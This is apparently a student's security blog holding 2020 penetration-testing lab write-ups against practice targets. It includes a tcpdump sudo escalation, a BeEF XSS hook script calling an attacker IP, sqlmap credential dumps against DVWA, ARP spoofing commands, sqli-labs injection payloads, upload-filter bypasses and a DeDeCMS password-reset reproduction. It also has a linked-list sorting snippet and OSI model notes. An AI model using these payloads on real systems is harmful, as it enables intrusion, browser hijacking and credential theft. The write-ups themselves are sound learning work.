心有猛虎细嗅蔷薇

网络渗透测试实验四

Tue, 08 Dec 2020 11:35:40 +0800

# Web Developer 靶机渗透

目的：获取靶机 Web Developer 文件 /root/flag.txt 中 flag。

# 1、发现目标 (netdiscover)，找到 WebDeveloper 的 IP 地址。

# 2.nmap 扫描靶机开放端口

# 3. 发现 http 服务并查看

发现是使用 WordPress 搭建的网站，尝试寻找登录后台.

# 4. 目录扫描

利用 wpscan 扫描

WPScan 是一个扫描 WordPress 漏洞的黑盒子扫描器，它可以为所有 Web 开发人员扫描 WordPress 漏洞并在他们开发前找到并解决问题。我们还使用了 Nikto ，它是一款非常棒的 Web 服务器评估工具，我们认为这个工具应该成为所有针对 WordPress 网站进行的渗透测试的一部分

发现 upload 目录，可能存在文件上传漏洞

发现后台可以尝试弱口令爆破

发现可以流量包文件，下载并分析

# 5. 流量包分析

利用过滤发现存在明文传输信息，发现是 wp 后台登录账号密码

成功登录

# 6.WordPress 插件漏洞利用

在 msf 搜索可用 payload

该漏洞需要配合 reflex gallery 插件使用，使用需要在管理员后台安装插件

版本在 3.14 之前才行！

漏洞脚本弹回了 shell, 尝试获取敏感信息

访问 wp-config 配置文件找到 mysql 的账号密码，尝试使用登录.

# 7. 尝试 ssh 登录

ssh *username@*ip

# 8. 用户提权

查看权限是 webdeveloper 用户

无法 cat 到 root 目录

sudo -l 查看当前用户可以使用的 root 权限指令

发现有 tcpdump, 尝试提权

touch /tmp/exploit1

写入 shellcode

echo 'cat /root/flag.txt' > /tmp/exploit

赋予可执行权限

chmod +x /tmp/exploit

利用 tcpdump 执行任意命令

sudo tcpdump -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root

获得 flag

网络渗透测试实验三

Sun, 22 Nov 2020 16:28:18 +0800

# 网络渗透测试实验三

# XSS 部分：利用 Beef 劫持被攻击者客户端浏览器。

实验环境：存在 xss 漏洞的留言板，IIS 虚拟机，Kali

# 1、利用 AWVS 扫描留言簿网站，发现其存在 XSS 漏洞。

可以看到你开默认模式的话会有大量的测试 payload 写入留言板

所以在实战扫描时要注意，扫描但🔒不要破坏资产

# 2、 Kali 使用 beef 生成恶意代码

打开终端启动 beef-xss 会自动生成恶意文件

并通过跨站运行脚本的形式操控被攻击者

# 3、访问留言簿网站，将恶意代码写入网站留言板.

<script src="http://192.168.0.135:3000/hook.js"></script>

# 4、管理员登录 login.htm，账号密码均为 admin，审核用户留言。只要客户端访问这个服务器的留言板，客户端浏览器就会被劫持，指定被劫持网站为学校主页，将你在 beff 中的配置截图。

# 5、回答问题：实验中 XSS 攻击属于哪种类型？

XSS 有三种类型

1. 反射型

反射型 XSS 一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。

对于访问者而言是一次性的，具体表现在我们把我们的恶意脚本通过 URL 的方式传递给了服务器，而服务器则只是不加处理的把脚本 “反射” 回访问者的浏览器而使访问者的浏览器执行相应的脚本。反射型 XSS 的触发有后端的参与，要避免反射性 XSS，必须需要后端的协调，后端解析前端的数据时首先做相关的字串检测和转义处理。

此类 XSS 通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 Cookies 或进行钓鱼欺骗。

2. 存储型

攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客，都有可能会执行这段恶意脚本，因此储存型 XSS 的危害会更大。

存储型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。

3.Dom 型

客户端的脚本程序可以动态地检查和修改页面内容，而不依赖于服务器端的数据。例如客户端如从 URL 中提取数据并在本地执行，如果用户在客户端输入的数据包含了恶意的 JavaScript 脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到 DOM-based XSS 攻击。需要特别注意以下的用户输入源 document.URL、 location.hash、 location.search、 document.referrer 等。

本次实验是存储型 XSS 漏洞

# SQL 注入部分：DVWA+SQLmap+Mysql 注入实战

实验环境搭建。启动 Metasploitable2 虚拟机。

用 kali 访问 Metasploitable2 的 dvwa

# 1、注入点发现。首先肯定是要判断是否有注入漏洞。

在输入框输入 1，返回

ID: 1

First name: admin

Surname: admin

返回正常；

再次输入 1'，报错，返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

此时可以断定有 SQL 注入漏洞，

下面利用 SQLMap 进行注入攻击。将 DVWA 安全级别设置为最低；

因为需要登陆到 dvwa 所以需要获取到 cookies (f12)

# 2、枚举当前使用的数据库名称和用户名。

sqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' -b --current-db --current-user

# 3、枚举数据库用户名和密码

sqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' -D dvwa --string="Surname" --users --password

# 4、枚举数据库

--dbs：枚举当前数据库

sqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' --dbs

# 5、枚举数据库和指定数据库的数据表

-D 数据库名：指定数据库

--tables：枚举指定数据库的所有表

sqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' -D mysql -T user --columns

# 6、获取指定数据库和表中所有列的信息

-D：指定的数据库

-T：指定数据库中的数据表

--columns：获取列的信息

sqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' -D mysql -T user -C user,password --dump

# 7、枚举指定数据表中的所有用户名与密码，并 down 到本地。

-C：枚举数据表中的列

--dump：存储数据表项

sqlmap -u '192.168.0.119/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#' --cookie='security=low; PHPSESSID=1b12f42a1d09ded8a69bef4a465df117' --string="Surname" -D dvwa -T users -C user,password --dump

文件保存在 root 文件夹需要 root 的权限才能查看，可以通过 chmod 命令更改权限。此外.local 文件是隐藏文件夹图形化界面按下组合键 ctrl+H 显示，命令行 ls -la.

# 总结

这次实验学习了 sqlmap 和 beef 的使用，了解了关于 sql 注入和 xss 利用的知识，没有金刚钻别揽瓷器活学会使用工具是提高效率的第一步。之后还要探索工具背后的实现原理，这样才能做到游刃有余！

组内实验推荐

Tue, 10 Nov 2020 20:24:54 +0800

# 推荐一下组内成员的博客

kfew

组内成员实验--easyfilesharing

kfew

组内成员实验——注册机

数据结构链表的排序实现

Wed, 04 Nov 2020 18:56:07 +0800

链接：十大经典排序算法（动画演示）

# 冒泡排序

	PNode p,q;//PNode 是结构体指针

	for (p = head->next; p != NULL; p = p->next)
	//p 赋值为数据域的第一个元素，遍历一遍
	for (q = p->next; q != NULL; q = q->next)
	// 相当于是将 p 和其后的所有元素比较
	if(p->data>q->data)//
	{
	int tp = p->data; p->data = q->data; q->data = tp; }

# 选择排序

	PNode p,q,Min;//PNode 是结构体指针

	for (p = head->next; p != NULL; p = p->next)
	// 假定 p 为所有元素的最小值
	for (q = p->next; q != NULL; q = q->next)
	//p 和其后所有比较，有小于 p 的话交换位置
	if(p->data>q->data)//
	{
	Min=q
	}

# 快速排序

	void QuickSort(linklist head,linklist tail)
	{
	// 递归结束条件：当只有 head 与 tail 元素时结束，因为每次我们传进来 mid 其实 mid 已经不用排序，如果只有两个元素而 mid 不需要排序则递归结束
	if (head->next==tail)
	{
	return ;
	}
	//p 连接的是比 mid 小的值的链表，q 连接是比 mid 大值的链表并且包括 mid
	listPoint mid=head->next;
	listPoint p=head;
	listPoint q=mid;
	listPoint t=mid->next;
	int pivot=mid->key;
	while (t!=tail)
	{
	if (t->key<pivot)
	{
	p=p->next=t;
	}
	else
	{
	q=q->next=t;
	}
	t=t->next;
	}
	//p 链表连接上 q 链表
	p->next=mid;
	q->next=tail;//q 链表尾部指向 NULL
	QuickSort(head,mid);// 递归调用 QuickSort
	QuickSort(mid,tail);
	}

C 语言链表快速排序

挖个坑... 未完待续...

网络渗透实验二

Tue, 03 Nov 2020 23:47:15 +0800

# 1、A 主机上外网，B 运行 sinffer (Wireshark) 选定只抓源为 A 的数据)。

# 1.1 写出以上过滤语句。

ip.src == ipaddress of A

wireshark 过滤规则及使用方法

# 1.2 B 是否能看到 A 和外网的通信（A 刚输入的帐户和口令）？为什么？

能，因为我们都是在一个网段下。网关会向所有人发送报文，不是本机 ip 会被电脑自动丢弃

# 2.1 为了捕获 A 到外网的数据，B 实施 ARP 欺骗攻击，B 将冒充该子网的什么实体？

网关（gateway）

# 2.2 写出 arpspoof 命令格式。

arpspoof -i 网卡 -t 目标 ip 网关

# 2.3 在互联网上找到任意一个以明文方式传递用户帐号、密码的网站，截图 Wireshark 中显示的明文信息。

密码是 base64 加密，相当于～无～

# arp 欺骗过程

环境：两台同网段的虚拟机 kali & unbuntu

1. 启动 arpspoof 实施 arp 欺骗，让本机冒充网关收发数据

	echo 1 > /proc/sys/net/ipv4/ip_forward
	首先开启数据包转发(linux)

2.wireshark 查看截获的数据

3. 过滤报文

= 看到用户在 http 下的明文数据 =

# 3.FTP 数据还原部分：利用 WireShark 打开实验实验数据 data.pcapng。

# 3.1 FTP 服务器的 IP 地址是多少？你是如何发现其为 FTP 服务器的？

FTP 支持两种模式，一种方式叫做 Standard (也就是 PORT 方式，主动方式)，一种是 Passive (也就是 PASV，被动方式)。 Standard 模式 FTP 的客户端发送 PORT 命令到 FTP 服务器。Passive 模式 FTP 的客户端发送 PASV 命令到 FTP Server。

FTP 服务器向用户询问密码，所以判断 192.168.182.1 是 FTP 服务器

# 3.2 客户端登录 FTP 服务器的账号和密码分别是什么？

可以看到有两次登录第一次失败了，第二次成功了

账号：student 密码：sN46i5y

# 3.3 客户端从 FTP 下载或查看了 2 个文件，一个为 ZIP 文件，一个为 TXT 文件，文件名分别是什么？提示：文件名有可能是中文。

压缩包：1.zip

文件：复习题.txt

# 3.4 还原 ZIP 文件并打开（ZIP 有解压密码，试图破解，提示：密码全为数字，并为 6 位）。截图破解过程。

文件传输层用的是 tcp 协议，ip 是 ftp 服务器

之后再查找压缩文件头 HEX 504B

可以看到 1.zip

追踪 tcp 数据流然后保存下来解压，发现有密码。

尝试破解

这里使用的是 ARCHPR

还好密码比较简单，之前暴力破解一个 zip 一个晚上都没出结果

随缘😂

还原后的图片

密码：123456

# 3.5 TXT 文件的内容是什么？

txt 文件没有 HEX 数据头，所以跟踪到文件

FTP DATA 中存有 txt 的原始数据

# 4、MD5 破解

# SqlMap 得到某数据库用户表信息，用户口令的 MD5 值为 7282C5050CFE7DF5E09A33CA456B94AE

那么，口令的明文是什么？（提示：MD5 值破解）

明文：iampotato

MD5 值目前的技术很难破解，一般采取 “碰撞” 的方式破解

网页链接：MD5 是什么？

# 5、John the Ripper 的作用是什么？

John the Ripper 是一个暴力破解密码的软件

采用的是字典爆破模式，可导入用户自己的字典

网页链接：密码破解利器 John the Rippe 使用详细

# 思考问题：

# 1、谈谈如何防止 ARP 攻击。

arp 欺骗原理

静态网关地址

# 2、安全的密码（口令）应遵循的原则。

比较冗长我总结一下

1. 不使用弱密码

2. 不重复使用密码

3. 密码难度依据重要程度而定

安全密码三原则

# 3、谈谈字典攻击中字典的重要性。

一个好的密码字典决定了破解的成功与否，好的密码字典要命中率高，所以最好的字典是根据个人的特性设计的，这样成功率会高一点。字典的重要性：字典中没有你要的密码的话都是白瞎！

# 4、实验小结。

本次试验我了解到了 arp 欺骗的原理，认识了 ftp 服务，知道了何为 MD5，但是都是简单的复现和认识。要灵活自如的上手还没有达到那个水平。在实验中 arpspoof 做 arp 欺骗成功了，网关和欺骗者 mac 地址相同，之后开启转发但是依旧失败。

安全路上上道阻且长，加油吧骚年！

网络渗透测试实验一

Fri, 30 Oct 2020 23:22:00 +0800

渗透测试实验一

# 1. 用搜索引擎 Google 或百度搜索麻省理工学院网站中文件名包含 “network security” 的 pdf 文档，截图搜索得到的页面

# 2. 照片中的女生在哪里旅行？截图搜索到的地址信息。

根据图片上的信息可以确定咖啡馆的名称，通过 google 地图可以查到地址为 38 Avenue de Suffren, 75015 Paris

虽然店铺装潢已经变了，但是还是可以通过图片中的披萨店和 2 楼窗台确定的

# 3、手机位置定位。通过 L

# AC（Location Area Code，位置区域码）和 CID（Cell Identity，基站编号，是个 16 位的数据（范围是 0 到 65535）可以查询手机接入的基站的位置，从而初步确定手机用户的位置。

获取自己手机的 LAC 和 CID：

Android 获取方法：Android：拨号 *##4636##* 进入手机信息工程模式后查看

iphone 获取方法：iPhone：拨号 * 3001#12345#* 进入 FieldTest

Serving Cell info–>LAC=Tracking Area Code -->cellid = Cell identity

若不能获取，用右图信息。

截图你查询到的位置信息。

我的手机是华为的，禁用了该程序。
测试手机为小米
```
实验应用原理
```
通过 LAC 反查可以获取到位置信息

# 4、编码解码

# 将 Z29vZCBnb29kIHN0dWR5IQ== 解码。截图。

# 5、地址信息

# 5.1 内网中捕获到一个以太帧，源 MAC 地址为：98-CA-33-02-27-B5；目的 IP 地址为：202.193.64.34，回答问题：该用户使用的什么品牌的设备，访问的是什么网站？并附截图。

# 5.2 访问 https://whatismyipaddress.com 得到 MyIP 信息，利用 ipconfig (Windows) 或 ifconfig (Linux) 查看本机 IP 地址，两者值相同吗？如果不相同的话，说明原因。

不同，因为我们获取到的是公网地址，而ipconfig获取的是内网（相对于公网ip下）因为用了NAT地址转换技术

# 6、NMAP 使用

# 6.1 利用 NMAP 扫描 Metasploitable2（需下载虚拟机镜像）的端口开放情况。并附截图。说明其中四个端口的提供的服务，查阅资料，简要说明该服务的功能。

# 6.2 利用 NMAP 扫描 Metasploitable2 的操作系统类型，并附截图。

网页链接：nmap 基本步骤

 nmap -sP 192.168.0.0/24 扫描存活
 nmap  192.168.xxx.xxx  发现存活主机后扫描端口
 namp -O 192.168.xxx.xxx  查看操作系统

# 6.3 利用 NMAP 穷举 Metasploitable2 上 dvwa 的登录账号和密码。

访问 ip 发现 80 有 http 服务发现了 dvwa 的登录界面

然后使用 nmap 自带的爆破脚本进行弱口令爆破

nmap -p80 --script=http-form-brute --script-args=http-form-brute.path=/dvwa/login.php 192.168.37.189

Over！拿到登录账号和密码

# 6.4 查阅资料，永恒之蓝 - WannaCry 蠕虫利用漏洞的相关信息。

WannaCry 勒索病毒复现及分析，蠕虫传播机制全网源码

WannaCry 勒索病毒主要行为是传播和勒索。

传播：利用基于 445 端口的 SMB 漏洞 MS17-010 (永恒之蓝) 进行传播
勒索：释放文件，包括加密器、解密器、说明文件、语言文件等；加密文件；设置桌面背景、窗体信息及付款账号等。

# 7、利用 ZoomEye 搜索一个西门子公司工控设备，并描述其可能存在的安全问题

搜索 simens 发现有很多工控设备开启了 ssh 服务和 telnet 服务，若无管理则有被爆破的风险。

# 8、Winhex 简单数据恢复与取证

# 8.1 elephant.jpg 不能打开了，利用 WinHex 修复，说明修复过程。

常见文件头汇总

jpg 的 hex 头尾 FFD8 修复一下就好

修复后文件：

用 binwalk 二进制分析可以看到有两张图片（错乱）

虽然两张图片一样大但是清晰度和大小比例均不如原图，可能是 ps 做出来的文件里面用的源文件吧.......😂

# 8.2 笑脸背后的阴霾：图片 smile 有什么隐藏信息。

Tom is the killer.. 🔪

# 8.3 尝试使用数据恢复软件恢复你的 U 盘中曾经删除的文件。

以前使用过 easyrecovery 修复随身听的歌曲，不过只成功了一部分，有一些坏道还是不能修复。

知乎：数据恢复原理

Dedecms漏洞复现

Sat, 24 Oct 2020 18:40:34 +0800

# 漏洞说明：

2018 年 1 月 10 日，锦行信息安全公众号公开了一个关于 DeDeCMS
前台任意用户密码修改漏洞的细节。
2018 年 1 月 10 日，Seebug 漏洞平台收录该漏洞，漏洞编号为
SSV-97074，知道创宇 404 漏洞应急团队成功复现该漏洞。

形成原因：

由于 php 弱类型比较形成绕过

限制：

只影响前台账户
只能修改未设置安全问题的账户

# 复现内容：

1. 首先使用 phpstudy 搭建本地服务并安装织梦 cms

在建站是遇到一些问题没有办法访问

解决方案：在 [hosts].{label} 中手动添加

# 注册并安装好数据库

要把会员功能开放并且无密保问题

# 开始使用漏洞修改

[注意一个账号只能访问改密码页面一次，否则要等 10 分钟 key 失效].

到此漏洞复现成功

# 更改后台 admin 密码

	直接访问该链接，即可重置admin前台为任意密码。
	重置admin前台密码之后，注意不要退出，继续留着cookie，继续进行修改admin后台密码

访问：系统设置 -> 个人资料 -> 基本资料
即

http://192.168.170.139/member/edit_baseinfo.php

进行后端密码更改之前，不能纯用 bp 发报文。这样浏览器拿不到重要 cookies 会导致无法依靠 cookie 使 admin 前台登录（登录界面禁用 admin 直接登录）

网页链接：DeDeCMS v5.7 {SP1,SP2} 密码修改漏洞（附 PoC）

qq流量包分析

Sat, 17 Oct 2020 21:36:36 +0800

# QQ 流量分析

使用工具：Wireshark

# 略缩图不见了！！！

# 半张图

本来是是一张 1.6MB 的完整的图，流量截取后出现错误

尝试了很多次发现只有大图片会发生不完整，推测是分成了两部分或多部分传输

# hxd 的图

意外抓到了别人的图，是因为 wifi 抓包的缘故（无线信号）

# 成功的尝试

输入判断条件：tcp and ip.dst==192.168.0.19

hex 搜索： ffd8

找到文件拖到本地还原

删除多余的报文 header，还原图片

总结

抓取文件格式只能是 jpg 格式，png gif pdf doc 文件均加密
大小号之间发图片都是加密的（用户和用户通信都加密）
大文件会分段传输，大小在 1MB 以下的话方便完整图片
wifi 传输并不安全

sqlilabs payload

Mon, 17 Aug 2020 19:51:14 +0800

# less 1~4

select TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=' 库名 ' LIMIT 0,1 // 爆表（一次一个）

select group_concat (table_name) from information_schema.tables where table_schema=0x7365637572697479 // 爆表（全部）前面是数据库 16 进制的编码

select group_concat (column_name) from information_schema.columns where table_name=0x656d61696c73 // 爆字段前面是数据库 16 进制的编码

select group_concat (id 字段名 1，email_id 字段名 2 。。。。) from email（表名）// 爆单个数据

# 报错注入（less-5，6）

首先利用盲注的方法获取表名等，然后报错注入回显。（针对页面无回显点）

id=-1' OR 1 GROUP BY CONCAT_WS (0x3a,database (),FLOOR (RAN (0)*2)) HAVING MIN (0) OR 1 --+ // 库

http://sql.com/Less-5/?id=1' and extractvalue (1,concat (0x23,(select table_name from information_schema.tables where table_schema=database () limit 0,1),0x23))--+// 表

http://sql.com/Less-5/?id=1' and extractvalue (1,concat (0x23,(select column_name from information_schema.columns where table_schema=database () and table_name='users' limit 0,1),0x23))--+ // 字段

http://sql.com/Less-5/?id=1' and length ((select table_name from information_schema.tables where table_schema=database () limit 0,1))>6--+// 长度判断

http://127.0.0.1/sqli/Less-5/?id=1’ and ascii (substr ((select schema_name from information_schema.schemata limit 1,1),1,1)) >100--+ 通过二分法猜解得到所有的库，红色为可变参数。

http://127.0.0.1/sqli/Less-5/?id=1’ and ascii (substr ((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1))>1--+ 再次通过二分法可猜解得到 security 下的所有表。其中，红色为可变参数。

http://127.0.0.1/sqli/Less-5/?id=1’ and ascii (substr ((select column_name from information_schema.columns where table_name=0x7573657273 limit 1,1),1,1)) >1 --+ 通过二分法可猜解 users 内的字段，其中红色为可变参数。

http://127.0.0.1/sqli/Less-5/?id=1’ and ascii (substr ((select username from security.users limit 1,1),1,1))>1--+ 继续猜解即可得到字段内的值。

What is OSI七层协议

Thu, 13 Aug 2020 00:00:00 +0800

# OSI 七层协议

# 第一层：物理层

用于传输介质中提供物理连接，实现比特流的透明传输。物理层的作用是实现相邻计算机节点之间比特流的透明传送，尽可能屏蔽掉具体传输介质和物理设备的差异。使其上面的数据链路层不必考虑网络的具体传输介质是什么。“透明传送比特流” 表示经实际电路传送后的比特流没有发生变化，对传送的比特流来说，这个电路好像是看不见的。

# 第二层：数据链路层

负责建立和管理节点间的链路。该层的主要功能是：通过各种控制协议，将有差错的物理信道变为无差错的、能可靠传输数据帧的数据链路。
在计算机网络中由于各种干扰的存在，物理链路是不可靠的。因此，这一层的主要功能是在物理层提供的比特流的基础上，通过差错控制、流量控制方法，使有差错的物理线路变为无差错的数据链路，即提供可靠的通过物理介质传输数据的方法。

大致是用于局域网里的根据端口的 MAC 地址做转发的协议

# 第三层：网络层

主要功能是控制子网的运行。通过路由选择算法，为报文或分组通过通信子网选择最适当的路径。该层控制数据链路层与传输层之间的信息转发，建立、维持和终止网络的连接。具体地说，数据链路层的数据在这一层被转换为数据包，然后通过路径选择、分段组合、顺序、进 / 出路由等控制，将信息从一个网络设备传送到另一个网络设备。
一般地，数据链路层是解决同一网络内节点之间的通信，而网络层主要解决不同子网间的通信。例如在广域网之间通信时，必然会遇到路由（即两节点间可能有多条路径）选择问题。

选择最好的路由线路，已获得最好的速度，比如有三条路可以走这层协议负责选取最短的路径。

# 第四层：传输层

该层的主要任务是：向用户提供可靠的端到端的差错和流量控制，保证报文的正确传输。传输层的作用是向高层屏蔽下层数据通信的细节，即向用户透明地传送报文。该层常见的协议：TCP/IP 中的 TCP 协议、Novell 网络中的 SPX 协议和微软的 NetBIOS/NetBEUI 协议。
传输层提供会话层和网络层之间的传输服务，这种服务从会话层获得数据，并在必要时，对数据进行分割。然后，传输层将数据传递到网络层，并确保数据能正确无误地传送到网络层。因此，传输层负责提供两节点之间数据的可靠传送，当两节点的联系确定之后，传输层则负责监督工作。综上，传输层的主要功能如下：
传输连接管理：提供建立、维护和拆除传输连接的功能。传输层在网络层的基础上为高层提供 “面向连接” 和 “面向无接连” 的两种服务。
处理传输差错：提供可靠的 “面向连接” 和不太可靠的 “面向无连接” 的数据传输服务、差错控制和流量控制。在提供 “面向连接” 服务时，通过这一层传输的数据将由目标设备确认，如果在指定的时间内未收到确认信息，数据将被重发。
监控服务质量。

负责数据包的重组和排序，从网络层获取的碎片式的数据包重新排序成原文。

# 第五层：会话层

主要任务是：向两个实体的表示层提供建立和使用连接的方法。将不同实体之间的表示层的连接称为会话。因此会话层的任务就是组织和协调两个会话进程之间的通信，并对数据交换进行管理。
会话层的具体功能如下：
会话管理：允许用户在两个实体设备之间建立、维持和终止会话，并支持它们之间的数据交换。例如提供单方向会话或双向同时会话，并管理会话中的发送顺序，以及会话所占用时间的长短。
会话流量控制：提供会话流量控制和交叉会话功能。
寻址：使用远程地址建立会话连接。
出错控制：从逻辑上讲会话层主要负责数据交换的建立、保持和终止，但实际的工作却是接收来自传输层的数据，并负责纠正错误。会话控制和远程过程调用均属于这一层的功能。但应注意，此层检查的错误不是通信介质的错误，而是磁盘空间、打印机缺纸等类型的高级错误。

为两端通信实体建立连接（会话），中间有认证鉴权以及检查点记录（供会话意外中断的时候可以继续，类似断点续传）。

# 第六层：表示层

其主要功能是 “处理用户信息的表示问题，如编码、数据格式转换和加密解密” 等。表示层的具体功能如下：
数据格式处理：协商和建立数据交换的格式，解决各应用程序之间在数据格式表示上的差异。
数据的编码：处理字符集和数字的转换。例如由于用户程序中的数据类型（整型或实型、有符号或无符号等）、用户标识等都可以有不同的表示方式，因此，在设备之间需要具有在不同字符集或格式之间转换的功能。
压缩和解压缩：为了减少数据的传输量，这一层还负责数据的压缩与恢复。
数据的加密和解密：可以提高网络的安全。

决定数据的展现（编码）形式，如同一部电影可以采样、量化、编码为 RMVB、AVI，一张图片能够是 JPEG、BMP、PNG 等。

# 第七层：应用层

它是计算机用户，以及各种应用程序和网络之间的接口，其功能是直接向用户提供服务，完成用户希望在网络上完成的各种工作。它在其他 6 层工作的基础上，负责完成网络中应用程序与网络操作系统之间的联系，建立与结束使用者之间的联系，并完成网络用户提出的各种网络服务及应用所需的监督、管理和服务等各种协议。此外，该层还负责协调各个应用程序间的工作。

如邮箱使用的 POP3，SMTP、远程登录使用的 Telnet、获取 IP 地址的 DHCP、域名解析的 DNS、网页浏览的 http 协议等；这部分协议主要是规定应用软件如何去进行通信的。

# OSI7 层模型的小结

由于 OSI 是一个理想的模型，因此一般网络系统只涉及其中的几层，很少有系统能够具有所有的 7 层，并完全遵循它的规定。
在 7 层模型中，每一层都提供一个特殊的网络功能。从网络功能的角度观察：下面 4 层（物理层、数据链路层、网络层和传输层）主要提供数据传输和交换功能，即以节点到节点之间的通信为主；第 4 层作为上下两部分的桥梁，是整个网络体系结构中最关键的部分；而上 3 层（会话层、表示层和应用层）则以提供用户与应用程序之间的信息和数据处理功能为主。简言之，下 4 层主要完成通信子网的功能，上 3 层主要完成资源子网的功能。

uploadlabs解析

Tue, 11 Aug 2020 00:00:00 +0800

第一关：
前端 js 函数白名单过滤
方法 1：BP 抓包改文件，先把 php 后缀改成白名单里的，然后抓包在改回来绕过前端
方法 2：在浏览器设置里关闭 js 函数
方法 3：在 consel 里运行改过的 html 源码（亲测未成功，js 路径报错）

第二关：
对于 content-type 的检验
BP 将 text/plain 改为 image/gif

第三关：
黑名单后缀
用类似等效的后缀代替（亦或是大小写）
比如说:.phtml .phps .php5 .pht，但如果上传的是.php5 这种类型文件的话，如果想要被当成 php 执行的话，需要有个前提条件，即 Apache 的 httpd.conf 有如下配置代码
大小写都可如.PhP .pHP (亲测失败)

第四关：
更全的黑名单
.htaccess，于是首先上传一个.htaccess 内容如下的文件:
SetHandler application/x-httpd-php
这样所有文件都会解析为 php，然后再上传图片马，就可以解析：

第五关：
黑名单，加上了.htaccess，但是没有将后缀进行大小写统一，于是可以通过大小写绕过，在 content-disposition filename=xxx.phP

Hello World

Tue, 24 Dec 2013 17:49:32 +0800

Welcome to Hexo! This is your very first post. Check documentation to learn how to use.

心有猛虎 细嗅蔷薇